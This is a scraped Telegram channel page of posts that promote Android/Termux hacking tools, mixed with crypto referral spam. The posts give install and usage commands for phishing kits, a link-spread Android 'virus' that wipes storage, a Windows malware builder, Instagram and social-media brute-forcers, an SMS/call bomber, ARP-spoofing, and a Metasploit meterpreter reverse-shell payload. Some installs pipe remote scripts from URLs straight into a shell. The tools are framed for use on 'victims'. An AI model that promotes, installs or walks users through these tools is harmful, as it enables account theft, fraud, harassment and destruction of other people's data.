Telegram Web Link
https://www.tg-me.com/tapswap_mirror_bot?start=r_303180024 🎁 +2.5k Shares as a first-time gift
Introducing "Phoenix" cutting-edge Automated Phishing Tool, equipped with over 45 up-to-date phishing templates to effectively deceive targets and steal sensitive information. Phoenix tool also features an advanced built-in URL masker to ensure that malicious links are undetectable to victims.
crackit - a multi-threaded password cracker

To install crackit, you can use the following command in your Termux terminal:

pkg install freaks4life/f.crackit

Basic Usage:

Once installed, you can use crackit to crack passwords using various methods. The basic syntax for crackit is as follows:

crackit [options] target_ip username password_file

Here, target_ip is the IP address of the target machine, username is the username you want to crack, and password_file is the path to a password list file.

For example, to crack the password for a user named "user" on a machine with IP address "192.168.1.100", you would use the following command:

crackit 192.168.1.100 user /path/to/passwordlist.txt

Options:

crackit has several options that you can use to customize its behavior. Here are some of the most commonly used options:

- t: Specify the target IP address (required)
- u: Specify the username (required)
- p: Specify the path to the password list file (required)
- d: Set the dictionary file (optional)
- m: Set the maximum number of threads (optional)
- b: Set the bruteforce mode (optional)
- r: Set the rainbow table mode (optional)

For example, to crack a password using a custom dictionary file and a maximum of 10 threads, you would use the following command

crackit -t 192.168.1.100 -u user -p /path/to/passwordlist.txt -d /path/to/dictionary.txt -m 10

Password List File:

A password list file is a text file that contains a list of potential passwords that crackit will use to try and crack the target password. You can create your own password list file or download one from online.

The format of the password list file is simple: each line in the file should contain a single password. For example:

password1
password2
password3
...

Rainbow Table File:

A rainbow table is a precomputed table of hash values for a set of passwords. crackit can use rainbow tables to speed up the cracking process by comparing hash values instead of trying every possible password.

You can download rainbow tables from online or create your own using tools like John the Ripper.

Bruteforce Mode:

Bruteforce mode allows crackit to try every possible password combination without using a password list or rainbow table. This can be useful for cracking very weak passwords, but it can also be slow and resource-intensive.

To enable bruteforce mode, use the -b option:

crackit -t 192.168.1.100 -u user -p /path/to/passwordlist.txt -b

Share and Support US: https://www.tg-me.com/Termux_For_Android
Infect is a bash based script which is officially made for termux users and from this tool you can spread android virus by just sending link. This tool works on both rooted Android device and Non-rooted Android device. Warning This Virus Formates (Deletes) Full Internal Storage So think and Use.

To Install "INFECT" Type The Following Commands "Each" On Your Termux Terminal

β€’ apt-get update -y
β€’ apt-get upgrade -y
β€’ pkg install python -y
β€’ pkg install python2 -y
β€’ pkg install git -y
β€’ pip install lolcat

Clone The RespositoryπŸ–‡

β€’ git clone https://github.com/noob-hackers/infect
cd $HOME


β€’ ls
β€’ cd infect
β€’ ls
β€’ bash infect.sh

Option Description

"INFECT" From this option you will get link of virus in your termux just send that link to your victim and let the fun happen.

"SAVE" From this option you will get link of virus in your termux just send that link to your victim and let the fun happen.

"EXIT" From this option you can exit from infect tool


Share and Support Us https://www.tg-me.com/Termux_For_Android
Websploit

Websploit is a high level MITM framework


Installation

$ git clone https://github.com/f4rih/websploit.git
$ cd websploit
$ python setup.py install


Execute via command line:

$ websploit


Select module:

wsf > use arp_spoof


with options command you can see options of current module:

wsf > arp_spoof > options


Change options with set command:

wsf > arp_spoof > set target 192.168.1.24


Finally run module via execute command:

wsf > arp_spoof > execute


Share and Support Us
https://www.tg-me.com/Termux_For_Android
SocialBox-Termux

SocialBox is a Bruteforce Attack Framework [ Facebook , Gmail , Instagram ,Twitter ]

Installation

apt-get update
apt-get install git
git clone https://github.com/samsesh/SocialBox-Termux.git
cd SocialBox-Termux
chmod +x install-sb.sh
./install-sb.sh


Run

./SocialBox.sh


Share and Support Us

https://www.tg-me.com/Termux_For_Android
MaskPhish

MaskPhish is not any Phishing tool. It's just a proof of concept of "URL Making Technology". It is a simple Bash Script to hide phishing URL under a normal looking URL (google.com or facebook.com). It can be integrated into Phishing tools (with proper credits) to look the URL ledgit.

Installation

## Clone the repository
git clone
https://github.com/jaykali/maskphish

## Enter into the directory
cd maskphish

## Run the script
bash
maskphish.sh


Share And Support Us:
https://www.tg-me.com/Termux_For_Android
IP-Tracer

πŸ‘‰ What is IP-Tracer ?

IP-Tracer is used to track an ip address. IP-Tracer is developed for Termux and Linux based systems. you can easily retrieve ip address information using IP-Tracer. IP-Tracer use ip-api to track ip address.

πŸ‘‰ How to install IP-Tracer ?

    git clone https://github.com/rajkumardusad/IP-Tracer.git

cd IP-Tracer

chmod +x install

sh install or ./install


πŸ‘‰ How to use IP-Tracer

trace -m to track your own ip address.

trace -t target-ip to track other's ip address for example ip-tracer -t 127.0.0.1

trace for more information.


OR

ip-tracer -m to track your own ip address.

ip-tracer -t target-ip to track other's ip address for example ip-tracer -t 127.0.0.1

ip-tracer for more information.


Share and support us:
https://www.tg-me.com/Termux_For_Android
Hacklock

Hacklock is a bash based script which is officially termux from this tool in just one click you can generate pattern phishing tool which can hack victim pattern and. This tool works on both rooted Android device and Non-rooted Android device.

πŸ‘‰ REQUIREMENTS :

internet
php
storage 1 GB
ngrok


πŸ‘‰ FEATURES :

[+] Real pattern hacking !
[+] Updated maintainence !
[+] Ngrok link
[+] Cloudflare link
[+] Easy for Beginners !


πŸ‘‰ INSTALLATION [Termux] :

apt-get update -y
apt-get upgrade -y
pkg install python -y
pkg install python2 -y
pkg install git -y
pip install lolcat
git clone https://github.com/noob-hackers/hacklock
cd $HOME
ls
cd hacklock
ls
bash setup
bash hacklock.sh


πŸ‘‰ USAGE OPTIONS [Termux] :


βœ… HACK PATTERN :

From this option you can create phishing pattern link which get keys of victim pattern after he used this link

Share and Support Us:
https://www.tg-me.com/Termux_For_Android
The Virus-Builder :- The Virus-Builder tool is a sophisticated program designed to create destructive malware specifically targeting Windows operating systems. This tool allows users to customize and configure the virus to automatically execute when inserted into a USB drive, increasing the potential for spreading the malware to other systems.

Installation (Termux)

[+] git clone https://github.com/Cyber-Dioxide/Virus-Builder/

[+] cd Virus-Builder

[+] ls

[+] pip install -r requirements.txt

[+] python3 Builder.py
Introduction:
TermuX Custom on GitHub offers advanced customization options for TermuX users, including personalized login screens, sound effects, and shell name changes for a dynamic experience.

Let's Begin:
To start, just follow the instructions given to update and enhance your TermuX setup, copy the TermuX Custom repository, and run the setup script to add the customized features. This repository is meant for educational use only and does not support any harmful actions.


Installation:

[+] apt update && apt upgrade

[+] pkg install git

[+] git clone https://github.com/Cod3r-Ak/TermuX-Custom

[+] cd TermuX-Custom

[+] chmod +x *

[+] bash setup.sh
πŸ’»"Instagram Bruteforce" a software application or method utilized to gain unauthorized access to Instagram accounts through a brute force attack.

Bruteforce Attack. Brute force is a trial-and-error method used by hackers to crack passwords or encryption by systematically trying all possible combinations until the correct one is found.

Installation:

[+] pkg update && upgrade

[+] pkg install git python

[+] git clone https://github.com/khamdihi-dev/Prem

[+] cd Prem

[+] chmod +x setup.sh

[+] ./setup.sh && python menu.py
πŸ’£"B4Bomber" is a hacking script offering several malicious functionalities, including an SMS Bomber to flood a target's phone with mass text messages, and a Call Bomber to overwhelm the target with repeated phone calls. It also has options to install or update the tool and provides information about the script.

Installation...

[+] apt-get update && apt-get upgrade && apt-get dist-upgrade && apt-get autoremove && apt-get autoclean && pkg update && pkg upgrade

[+] sh -c "$(curl -fsSL https://raw.githubusercontent.com/mahendraplus/B4Bomber/main/Termux/install.sh)"

OR...

[+] git clone https://github.com/mahendraplus/B4Bomber

[+] cd B4Bomber

[+] chmod 777 b4bomber

[+] ./b4bomber

Share & Support
@Termux_For_Android
🎣"CyberPhish" A sophisticated and fully customizable phishing tool

Installation...

[+] apt install python3

[+] pip install colorama

[+] git clone https://github.com/Cyber-Dioxide/CyberPhish

[+] cd CyberPhish

[+] ls

[+] pip install -r requirements.txt

[+] python3 CyberPhish.py
https://www.tg-me.com/cexio_tap_bot?start=1726853249856251
CEXP tokens farming major upgrade! Two is better than one! Join my squad, and let's double the fun (and earnings πŸ€‘)! CEX.IO Power Tap! πŸš€
What is Metasploit?

- Metasploit is a tool that is used for finding and fixing loopholes in a system or a network. Metasploit is commonly used by ethical hackers and penetration testers.

Metasploit has many valuable items, like exploits, payloads, modules, and more.

With the help of Metasploit, you can find security loopholes in systems and networks, and you can also easily use those loopholes to access networks and devices.

Metasploit was developed by HD Moore in 2003, now it is maintained by Rapid7, a security company situated in the United States.

how to install metasploit in termux?

You can easily install Metasploit in Termux by running some simple commands.

Here are the commands to install metasploit in Termux:

First you need to Download Termux Apk latest version, after that open it and run the following commands one by one:

1. Update and upgrade Termux packages:

apt update && apt upgrade -y 


2. Install Required Packages:

pkg install wget curl openssh git -y


3. Install ncurses-utils:

pkg install ncurses-utils


4. Install Metasploit:

source <(curl -fsSL https://kutt.it/msf)


Installation process may take 30 minutes to 1 hour, depending on your internet speed.

After successfully completing the installation process, you are ready to launch Metasploit in Termux. You can simply launch Metasploit by running the following command:

5. Run Metasploit:

./msfconsole


To be continued...



Share & Support
@Termux_For_Android
Termux Hackers (Users)
What is Metasploit? - Metasploit is a tool that is used for finding and fixing loopholes in a system or a network. Metasploit is commonly used by ethical hackers and penetration testers. Metasploit has many valuable items, like exploits, payloads, modules…
How to Use Metasploit in Termux?

Once you have installed and run Metasploit in Termux, you can explore the available Metasploit modules and payloads by using this command:

search {keyword}


Replace {keyword} with the type of module that you are interested in or want to use. For example, if you are interested in Android modules, then type search Android, and it will show you all the available modules and exploits for Android.

After finding your interested module, type the following command to use that module:

use {module_name}


Replace the module name with the actual module name that you want to use. For example:

use payload/android/meterpreter_reverse_tcp


After selecting your desired module, you need to set options like the target IP address, port, or payload. To set IP address and port, you need to run commands like this:

set RHOSTS {target_ip}

set RPORT {target_port}


Rhost means target IP address, and replace {target IP} with the actual IP address of your target. Rport means port number that you can set any 4 digit number like 4444.

You can simply run show options command to see the required options for the selected module.


show options


Once you have selected the module and set its required options, you are ready to exploit your module by running the following command:

exploit


Source: https://www.termuxcommands.com/metasploit-in-termux/

Share & Support
@Termux_For_Android
2025/10/20 01:30:24
Back to Top
HTML Embed Code: